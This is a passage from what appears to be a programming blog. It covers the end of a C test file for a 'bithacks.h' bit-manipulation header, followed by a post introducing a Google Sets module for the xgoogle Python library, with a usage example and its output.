    TEST_OK(B_PROPAGATE_1(x), B8(10101011));
}

void test_B_ISOLATE_0()
{
    unsigned char x;

    x = B8(00000000);
    TEST_OK(B_ISOLATE_0(x), B8(00000001));
    TEST_OK(B_ISOLATE_0(x), B8(00000010));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00000011);
    TEST_OK(B_ISOLATE_0(x), B8(00000100));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00000111);
    TEST_OK(B_ISOLATE_0(x), B8(00001000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00001111);
    TEST_OK(B_ISOLATE_0(x), B8(00010000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00011111);
    TEST_OK(B_ISOLATE_0(x), B8(00100000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00111111);
    TEST_OK(B_ISOLATE_0(x), B8(01000000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(01111111);
    TEST_OK(B_ISOLATE_0(x), B8(10000000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(11111111);
    TEST_OK(B_ISOLATE_0(x), B8(00000000));

    x = B8(01010101);
    TEST_OK(B_ISOLATE_0(x), B8(00000010));

    x = B8(01010111);
    TEST_OK(B_ISOLATE_0(x), B8(00001000));

    x = B8(01011111);
    TEST_OK(B_ISOLATE_0(x), B8(00100000));

    x = B8(01111111);
    TEST_OK(B_ISOLATE_0(x), B8(10000000));
}

void test_B_TURNON_0()
{
    unsigned char x;

    x = B8(00000000);
    TEST_OK(B_TURNON_0(x), B8(00000001));
    TEST_OK(B_TURNON_0(x), B8(00000011));
    TEST_OK(B_TURNON_0(x), B8(00000111));
    TEST_OK(B_TURNON_0(x), B8(00001111));
    TEST_OK(B_TURNON_0(x), B8(00011111));
    TEST_OK(B_TURNON_0(x), B8(00111111));
    TEST_OK(B_TURNON_0(x), B8(01111111));
    TEST_OK(B_TURNON_0(x), B8(11111111));
    TEST_OK(B_TURNON_0(x), B8(11111111));

    x = B8(10101010);
    TEST_OK(B_TURNON_0(x), B8(10101011));
    TEST_OK(B_TURNON_0(x), B8(10101111));
    TEST_OK(B_TURNON_0(x), B8(10111111));
    TEST_OK(B_TURNON_0(x), B8(11111111));

    x = B8(10000000);
    TEST_OK(B_TURNON_0(x), B8(10000001));
    TEST_OK(B_TURNON_0(x), B8(10000011));
    TEST_OK(B_TURNON_0(x), B8(10000111));
    TEST_OK(B_TURNON_0(x), B8(10001111));
    TEST_OK(B_TURNON_0(x), B8(10011111));
    TEST_OK(B_TURNON_0(x), B8(10111111));
    TEST_OK(B_TURNON_0(x), B8(11111111));
}

int main()
{
    test_B8();
    test_B_EVEN();
    test_B_ODD();
    test_B_IS_SET();
    test_B_SET();
    test_B_UNSET();
    test_B_TOGGLE();
    test_B_TURNOFF_1();
    test_B_ISOLATE_1();
    test_B_PROPAGATE_1();
    test_B_ISOLATE_0();
    test_B_TURNON_0();

    TEST_END;

    return error_count ? EXIT_FAILURE : EXIT_SUCCESS;
}

Download "bithacks.h" header file:

Download: bithacks.h
Downloaded: 4186 times.
Download url: http://www.catonmat.net/download/bithacks.h

Download: bithacks-test.c
Downloaded: 3452 times.
Download url: http://www.catonmat.net/download/bithacks-test.c

The next post about this topic will be on advanced bithacks and extending bithacks.h with these new, advanced bithacks.

Have fun!

Google Python Search LibraryAs promised in my previous post on xgoogle library, I have added a module to get results from Google Sets.

Google Sets allows to automatically create groups of related items from a few example items. For example, you feed it "red, green, blue," and it will predict other colors such as "yellow, black, white, brown, etc."

One of the most fascinating applications that this library can be used for is predicting domain names. Most sysadmins have a coherent naming policy for their systems. For example, a sysadmin at a university might call his machines "psychology.university.edu", "art.university.edu", "geography.university.edu", etc. Now, if we feed these names "psychology, art, geography" to Google Sets, it would come up with more names such as "history, mathematics, biology, and others". Now we can do DNS scans to find if there really are such machines. This is a pretty powerful method for reconnaissance.

There are many other interesting applications. Black hat SEO's may use it to stuff their pages with related keywords and thus rank for more words on search engines. Linguists can use it for various natural language processing problems. Various word guessing games can be created.

But my personal goal in writing this library was to use it for my English language perfection and correction tool that I will release in one of the next posts about this project. I wrote more about this idea in the introductory post of xgoogle library. Please see that post for more info.

The new module is called "googlesets", and to use it, import "GoogleSets" and create an object of this type. Pass the list of items to create the prediction from to the constructor. Then use "get_results()" member function to get the list of predicted items. It returns a list of Unicode strings, so make sure to use a proper encoding when outputting them.

Here is an example usage of the new module. It finds items related to programming languages "python" and "perl":

from xgoogle.googlesets import GoogleSets
gs = GoogleSets(['python', 'perl'])
items = gs.get_results()
for item in items:
  print item.encode('utf8')

Output:

python
perl
php
ruby
java
javascript
c++
c
cgi
tcl
c#

The output matches that of Google Sets itself:

Google Sets Predicted Items from Perl and Python

See the readme.txt file in the xgoogle archive for more examples.

Download "xgoogle" library:

Download: xgoogle library (.zip)
Downloaded: 23800 times.
Download url: http://www.catonmat.net/download/xgoogle.zip

Have fun and let me know if you find this library useful in any way in your own projects.